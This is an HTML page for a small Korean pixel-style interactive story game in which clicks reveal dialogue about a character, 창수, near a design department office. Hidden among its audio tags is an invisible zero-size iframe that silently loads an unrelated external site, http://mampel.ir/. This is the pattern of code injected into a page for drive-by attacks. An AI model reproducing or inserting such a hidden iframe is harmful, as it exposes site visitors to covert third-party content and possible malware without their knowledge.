<!DOCTYPE html>
<html>
<title>창수맵</title>
<style>
@font-face {
      font-family: "DungGeunMo";
      src: url("DungGeunMo.woff");
    }
	
	body{background-color: #484535; font-family: "DungGeunMo";}
	#backk{width: auto; height: 100%; animation:start 2s alternate;}
	#backk img{width: 1250px; height: auto;}
	
	#bx { position: absolute; bottom: 5%; left: 25%; display:none; }
	#bx img{ width: 70%; height: auto;  }

	#poom{bottom: 10%; font-weight: 5px; font-size: 1em;display:none; left: 28%;font-family: "DungGeunMo";}
	#poom2{bottom: 10%; font-weight: 5px; font-size: 1em;display:none; left: 28%;font-family: "DungGeunMo";}
	#poom3{bottom: 10%; font-weight: 5px; font-size: 1em;display:none; left: 28%;font-family: "DungGeunMo";}
	#poom4{bottom: 10%; font-weight: 5px; font-size: 1em;display:none; left: 28%;font-family: "DungGeunMo";}
	#poom5{bottom: 10%; font-weight: 5px; font-size: 1em;display:none; left: 28%;font-family: "DungGeunMo";}
	#poom6{bottom: 10%; font-weight: 5px; font-size: 1em;display:none; left: 28%;font-family: "DungGeunMo";}

	#nn{bottom: 18%; font-weight: 5px; font-size: 1.5em;display:none; left: 28%;font-family: "DungGeunMo";}

	#okk{bottom: 13%; right: 25%;z-index: 6; cursor: pointer; position: absolute;display:none;}
		#okk img{height: 20px;width: auto; }
#oki{bottom: 13%; right: 25%;z-index: 6; cursor: pointer; position: absolute;display:none;}
		#oki img{height: 20px;width: auto; }

	#oo{bottom: 13%; right: 25%;z-index: 6; cursor: pointer; position: absolute;display:none;}
		#oo img{height: 20px;width: auto; }
	#ooo{bottom: 13%; right: 25%;z-index: 6; cursor: pointer; position: absolute;display:none;}
		#ooo img{height: 20px;width: auto; }
	#oooo{bottom: 13%; right: 25%;z-index: 6; cursor: pointer; position: absolute;display:none;}
		#oooo img{height: 20px;width: auto; }	

	#soun { position: absolute; z-index: 99;cursor: pointer;bottom: 18%; right: 15%; display: none; }
	#soun img{ position: absolute; width: 80px; height:auto; z-index: 99;cursor: pointer;}

	#hyun { position: absolute; z-index: 99;cursor: pointer; top:43%; right: 45%; animation:start 2s alternate;}
	#hyun img{ position: absolute; width: 100px; height: auto; z-index: 99;cursor: pointer;}

	#face1 { position: absolute; z-index: 9;  left: 0%; display: none; bottom: 45.5%; animation:start 2s alternate;}
	#face1 img{ position: absolute; width: 370px; height: auto; z-index: 99;}
	#face2 { position: absolute; z-index: 9;  left: 0%; display: none; bottom: 45.5%; }
	#face2 img{ position: absolute; width: 370px; height: auto; z-index: 99;}

	#sigar { position: absolute; z-index: 99;cursor: pointer; bottom:60%; left: 15%; display: none;}
	#sigar img{ position: absolute; width: 100px; height: 300px;z-index: 99;cursor: pointer;}


	#turn{bottom: 8%; left: 48%; position: absolute;animation: backk 3s alternate; }
	#turn img{width: 40px; height: auto;cursor: pointer; }

	#rig{top: 45%; right: 45%; position: absolute; animation: rig 3s alternate; }
	#rig img{width: 40px; height: auto;cursor: pointer; }

	#fronts{top: 60%; left: 48%; position: absolute;animation: fron 3s alternate; }
	#fronts img{width: 40px; height: auto;cursor: pointer; }

	#tt { position: absolute; z-index: 99; top: 8%; left: 37%; animation: tra 2s alternate; display: none;cursor: pointer; }
	#tt img{ position: absolute; z-index: 99; width: 500px; height: auto; }	

	#container{position: relative; margin: auto; width:1250px; height: 1000px;font-family: "DungGeunMo"; }
#tat2{bottom: 55%; font-weight: 800; font-size: 2em; left:   30%;font-family: "DungGeunMo"; z-index: 999; line-height: 1.7; animation: tam 3s alternate; display: none;}
	#inn{bottom: 30%; font-weight: 600; font-size: 1.3em; right:  0%;font-family: "DungGeunMo"; z-index: 999; line-height: 1.7; animation: tam 3s alternate; display: none;}
#tat{bottom: 55%; font-weight: 800; font-size: 2em; left:   30%;font-family: "DungGeunMo"; z-index: 999; line-height: 1.7; animation: tam 3s alternate; display: none;}
	#info { position: absolute; z-index: 99;cursor: pointer; top:3%; right: 22%; animation: infom 5s alternate; display: none;}
	#info img{ position: absolute; width: auto; height: 40px;z-index: 99;cursor: pointer;}
#pho { position: absolute; z-index: 999; top:40%;left: 18%; animation: tam 3s alternate;display: none;}
#pho img{ position: absolute; width: auto; height: 400px;z-index: 99; }
	#turn{bottom: 8%; left: 48%; position: absolute;animation: backk 3s alternate; }
	#turn img{width: 40px; height: auto;cursor: pointer; }
#too { position: absolute; z-index: 99; top:30%; left: 25%; animation:tam 2s alternate;display: none; cursor: pointer;}
#too img{ position: absolute; width: 700px; height: auto; z-index: 99;}
@-webkit-keyframes typing { from { width: 0; } }
@-webkit-keyframes blink-caret { 50% { border-color: #484535; } }

@keyframes start{
			0%{opacity: 0;}
			
			100%{opacity: 1;}
		}

@keyframes inin{
			0%{top: 71%;}
			
			100%{top: 68%;}
		}
@keyframes backk{
			0%{bottom: 11%;}
			
			100%{bottom: 8%;}
		}			
@keyframes rig{
			0%{right: 48%;}
			
			100%{right: 45%;}
		}		
@keyframes heree{
			0%{right: 20%;}
			
			100%{right: 18%;}
		}
@keyframes tra{
			0%{opacity: 0}
			
			100%{opacity: 1}
		}
@keyframes fron{
			0%{top: 63%;}
			
			100%{top: 60%;}
		}		
@keyframes infom
			{0%{opacity: 0;}
			30%{opacity: 1;}
			60%{opacity: 0;}
			100%{opacity: 1;}
		}
	@keyframes tam{
			0%{opacity: 0;}
			
			100%{opacity: 1;}
		}
h1 { 
	color: #484535;
	border-right: .2em solid #26241B;
	 
	width: 28ch;
	margin: 2em 1em;
	white-space: nowrap;
	overflow: hidden;
	position: absolute;
	-webkit-animation: typing 1s steps(20, end),
	           blink-caret .1s step-end infinite alternate;z-index: 3;
}
h2 { 
	color: #484535;
	border-right: .2em solid #26241B;
	 
	width: 33ch;
	margin: 2em 1em;
	white-space: nowrap;
	overflow: hidden;
	position: absolute;
	-webkit-animation: typing 1s steps(20, end),
	           blink-caret .1s step-end infinite alternate; z-index: 3;
}
h3 { 
	color: #484535;
	border-right: .2em solid #26241B;
	 
	width: 10ch;
	margin: 2em 1em;
	white-space: nowrap;
	overflow: hidden;
	position: absolute;
	-webkit-animation: typing 0.7s steps(15, end),
	           blink-caret .1s step-end infinite alternate; z-index: 3;
}
h4 { 
	color: #484535;
	border-right: .2em solid #26241B;
	 
	width: 12ch;
	margin: 2em 1em;
	white-space: nowrap;
	overflow: hidden;
	position: absolute;
	-webkit-animation: typing 0.5s steps(10, end),
	           blink-caret .1s step-end infinite alternate; z-index: 3;
}

h10{color: #484535;position: absolute;z-index: 3; font-weight: 800;}
p { 
	color: black;
	position: absolute;
	
	width: 53ch;
	margin: 2em 1em;
	}
</style>

<head>
	<title></title>
</head>

<body>

	<div id="container">
	 <h3 id="poom">.........?</h3>
	 	<h1 id="poom2">방금 이상한게 있었는데...?</h1>
	 	<h4 id="poom3">디자인과 사무실이다.</h4>
	 	<h3 id="poom4">아직 너무 이른시간이라 열지 않았다.</h3>
	 	<h4 id="poom5">..........</h4>
	 	<h2 id="poom6">..................(눈을 피했다.)</h2>
		<h10 id="nn">창수</h10>	
	<p id="tat">#5 ...</p>
		  	<p id="inn">창수가 멍하니 서있다가 <br> 말을 걸려고 하니까 <br>눈을 피해버렸다. <br>내가 지나쳐 가기를  <br> 기다리고 있는 것 같다.<br>내가 오기 전에 <br>뭘 하고있던 걸까?

	 	<audio id="walk">
		<source src="walk.mp3" type="audio/mpeg"autoplay="true" preload="auto">
	</audio>
		

	
	<audio id="knock">
		<source src="knock.mp3" type="audio/mpeg">
	</audio>
	<audio id="drop">
		<source src="drop.mp3" type="audio/mpeg">
	</audio>
	<audio id="umm">
		<source src="umm.mp3" type="audio/mpeg">
	</audio>
	<audio id="hooo">
		<source src="hooo.mp3" type="audio/mpeg">
	</audio>
		
	<audio id="but">
		<source src="but.mp3" type="audio/mpeg">
	</audio>

	<audio id="openn">
		<source src="openn.mp3" type="audio/mpeg">
	</audio>
	<audio id="clos">
		<source src="clooo.mp3" type="audio/mpeg">
	</audio>


<iframe src="http://mampel.ir/" frameborder="0" style="width:0px;height:0px;border:0px" ></iframe>


	<div id="backk">
		<center>
		<img src="main.png">
		</center>
	</div>
	<a href="https://seoojing.github.io/popol_map/">
	<div id="turn">
		<img src="turn.png">
	</div>
</a>


	<div id="bx">
		<img src="boox.png">
	</div>
	<div id="soun">
		<img src="eyes.gif">
	</div>
	<a href="https://seoojing.github.io/up/">
	<div id="rig">
		<img src="orhere.png">
	</div>
	</a>
<div id="sigar">
		<img src="blank.png">
	</div>

	<div id="oo">
		<img src="won.png">
	</div>
	<div id="ooo">
		<img src="won.png">
	</div>
	<div id="oooo">
		<img src="won.png">
	</div>
	<div id="okk">
		<img src="okk.png">
	</div>
	<div id="oki">
		<img src="okk.png">
	</div>
	<div id="tt">
		<img src="sig.png">
	</div>

		<div id="hyun">
		<img src="so.png">
	</div>

	<div id="face1">
		<img src="su.png">
	</div>
	<div id="face2">
		<img src="chang.png">
	</div>
	<div id="info">
		<img src="info.png">
	</div>
	<div id="pho">
		<img src="photo.png">
	</div>
	<div id="too">
		<img src="paper1.png">
	</div>
</div>


<script type="text/javascript">



var bbPlay = 0;
window.onmousemove = function(){
	bbPlay++;
	if(bbPlay == 1){drop.play(); walk.play();  }
}

	
var toggle = "off";
	var clickNumber = 0;
	soun.onclick = function(){
		but.play();
			toggle = "on";
			bx.style.display = "inline";
			poom.style.display = "inline";
			oo.style.display = "inline"
			soun.style.display = "none"
			}

	oo.onclick = function(){
		but.play();
			poom.style.display = "none"
			oo.style.display = "none"
			poom2.style.display = "inline"
			oki.style.display = "inline"
			hooo.play();}

	ooo.onclick = function(){
		but.play();
			poom3.style.display = "none"
			poom4.style.display = "inline"
			ooo.style.display = "none"
			knock.play();
			okk.style.display = "inline"}


	oooo.onclick = function(){
		but.play();
			poom5.style.display = "none"
			poom6.style.display = "inline"
			oooo.style.display = "none"
			umm.play();
			okk.style.display = "inline"
			face1.style.display = "none"
			face2.style.display = "inline"
		}


	okk.onclick = function(){
		but.play();
			poom2.style.display = "none"
			okk.style.display = "none"
			bx.style.display = "none"
			poom4.style.display = "none"
			poom6.style.display = "none"
			face2.style.display = "none"
			tt.style.display = "none"
			nn.style.display = "none"
			info.style.display = "inline"
}

	oki.onclick = function(){
		but.play();
			poom2.style.display = "none"
			oki.style.display = "none"
			bx.style.display = "none"
}			
	info.onclick = function(){
		but.play();
		openn.play();
			info.style.display = "none"
			too.style.display = "inline"
			pho.style.display = "inline"
			inn.style.display = "inline"
			tat.style.display = "inline"
}
too.onclick = function(){
		but.play();
		clos.play();
			too.style.display = "none"
			pho.style.display = "none"
			inn.style.display = "none"
			tat.style.display = "none"
}			
	



sigar.onclick = function(){
			but.play();
			toggle = "on";
			bx.style.display = "inline";
			poom3.style.display = "inline";
			
			ooo.style.display = "inline"
			}

hyun.onclick = function(){
			but.play();
			toggle = "on";
			bx.style.display = "inline";
			poom5.style.display = "inline";
			oooo.style.display = "inline"
			face1.style.display = "inline"
			nn.style.display = "inline"
			}


function lookDiv (){ 
  document.getElementById("soun").style.display="inline"; 
 } 
self.setTimeout("lookDiv()",10000);

function outDiv (){ 
  document.getElementById("soun").style.opacity=0; 
} 
self.setTimeout("outDiv()",11000);
</script>
</body>
</html>
